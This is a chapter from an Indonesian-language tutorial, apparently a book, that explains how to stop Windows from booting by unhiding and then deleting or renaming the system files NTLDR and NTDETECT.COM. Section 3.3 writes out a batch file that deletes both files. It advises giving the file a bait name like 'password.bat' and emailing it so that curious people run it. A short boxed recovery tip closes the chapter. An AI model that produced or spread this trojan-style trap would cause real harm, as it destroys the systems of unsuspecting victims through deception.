Booting Gagal
Ada satu atau dua file Windows yang rentan untuk dimanipulasi. File tersebut ada di root directory. Dengan tidak adanya file ini, dapat dipastikan sistem operasi Windows akan gagal di-boot sejak awal komputer dihidupkan. Ini adalah trik kuno yang kerapkali dieksploitasi oleh beberapa virus maker (Vx), dan untuk menambah pengetahuan, saya pikir tidak ada salahnya saya tulis lagi.
3.1
Mencari File NTLDR
Target file yang kita cari adalah file yang bernama NTLDR. Letaknya ada di root. Oke! Kita panggil Windows Explorer dan melihat root directory sistem.
17
Gambar 3.1. Root directory
Apa yang terjadi? Saat kita teliti ternyata file yang kita cari tidak diketemukan. Error? Tidak! Memang seharusnya begitu…☺ Jika setingan Windows Explorer kita masih standar, file tersebut tidak akan terlihat, karena ia mempunyai sifat hidden dan system. Alias tersembunyi. Untuk dapat melihatnya, kita akan membuka kuncian tersebut.
Gambar 3.2. File yang dicari tidak diketemukan
Syarat pertama agar dapat melihat file terlarang NTLDR adalah kita harus mematikan kuncian Folder Options. Panggil Windows Explorer dan aktifkan pilihan Folder Options via menu bar Tools.
18
Gambar 3.3. Mengaktifkan folder options
Jendela Folder Options akan tampil dengan beberapa tab pilihan. Klik Tab View. Perhatikan pada bagian Advanced settings. Di sana banyak sekali pengaturan yang berhubungan erat dengan Windows Explorer yang kita pakai.
Gambar 3.4. Folder Options tab View
Klik pilihan Show hidden files and folders sehingga aktif terpilih. 19
Gambar 3.5. Pilihan show hidden files and folders
Pengaktifan pilihan ini bertujuan untuk menampilkan file atau folder yang tersembunyi (hidden) secara normal pada Windows. Namun hanya dengan cara ini, file yang kita inginkan belumlah muncul. Karena file tersebut selain bersifat hidden (tersembunyi) ia juga bersifat system (embahnya hidden.. ☺). Oleh karena itu, kita harus menyesuaikan pengaturan lagi untuk menampilkan file sistem. Caranya? Hilangkan centang pada pilihan Hide protected operating system (Recommended).
Gambar 3.6. Pilihan Hide protected operating ….
Jika muncul pesan peringatan dari Windows, yang menakuti-nakuti kita, abaikan saja. Tetap dengan tenang memilih Yes. Lalu klik Apply dan OK. 20
Gambar 3.7. Pesan peringatan
Selesailah sudah! Dengan pengaturan tersebut tidak ada lagi file yang disembunyikan oleh Windows. Artinya, file system yang kita cari akan terlihat .. ☺ Sekarang kita kembali panggil Windows Explorer. Perhatikan! Di sana akan muncul seluruh file yang ada tanpa terkecuali. File-file hidden dan system akan terlihat berwarna samar (grey).
Gambar 3.8. Data di root directory terlihat semua
Coba, telitilah! Seharusnya di sana ada file yang bernama NTLDR. Itulah file target kita.
21
Gambar 3.9. File NTLDR ditemukan
Lalu apa yang harus kita lakukan dengan file tersebut? Ya … file tersebut harus dibuat menjadi tidak ada. Cara tergampang adalah dengan menghapusnya. Atau, jika mau sedikit halus, kita dapat sekadar melakukan ganti nama (rename) file tersebut dengan sembarang nama. Misalnya dari ntldr kita ganti dengan nama xntldr atau ldr atau terserah Sampeyanlah…. Coba hapus atau rename file tersebut, dan booting komputer. Proses booting akan gagal me-load sistem operasi Windows dan menampilkan pesan: NTLDR is missing… Dan komputer menjadi Hang … Windows telah tewas seketika …. ☺
3.2 Membunuh dengan Cara Lain Selain file NTLDR ada juga file lain yang dapat kita manipulasi, yang dapat menyebabkan kematian Windows dengan cara yang mirip. File tersebut bernama NTDETECT.COM. File ini juga dipakai Windows dalam rangka booting.
22
Gambar 3.10. NTDETECT.COM
Caranya sama saja. Hapus atau ganti nama file tersebut. Proses gagal booting ke Windows akan terjadi. Hanya saja pesan yang ditampilkan akan lain. ☺ Jika Anda termasuk tipe maniak yang kejam, tentu saja dapat menghapus kedua file tersebut tanpa basa-basi lagi. Capek deh…!
3.3
Menyederhanakan Pembunuhan
Untuk mempercepat dan mempermudah pembunuhan dengan metode kasar ini, kita dapat membuat suatu file BAT (batch file). Buka Notepad, dan ketikkan data sebagai berikut: Echo off Del c:\ntldr Del c:\ntdetect.com Simpan dengan nama yang menarik hati. Misalnya passcode.bat, password.bat, atau … terserah dengan kreativitas Sampeyan.
Gambar 3.11. Isi file bat jebakan
23
Yang penting dapat memancing minat orang sok pengin tahu untuk menjalankannya. Hehehe… ☺ Kirim file BAT tersebut ke orang lain, via email misalnya. Jika pemakai mengklik ganda atau menjalankan file tersebut, Wasallam… mati sudah Windows! Bagaimana mengatasi masalah ini? Seperti yang sudah-sudah ... saya tidak akan menjawabnya. Coba pecahkan sendiri. Sebetulnya gampang kok, entah bagaimana caranya, Anda cukup mencari file-file tersebut dari CD Windows (atau sumber lainnya) dan mengopinya ke lokasi root. Masalah selesai! Tapi … tetap saja kena duluan.
SKAK MAT!!!
============================================== Untuk mengatasi masalah ini, entah bagaimana caranya, Anda harus dapat mengembalikan file NTLDR dan NTDETECT.COM yang telah hilang atau terhapus tersebut. Anda dapat memakai CD Windows dan mengambil kedua file yang rusak/hilang tersebut dari CD. Atau kopi file dari komputer lain yang masih sehat dan kopi ke komputer yang bermasalah.
==============================================
24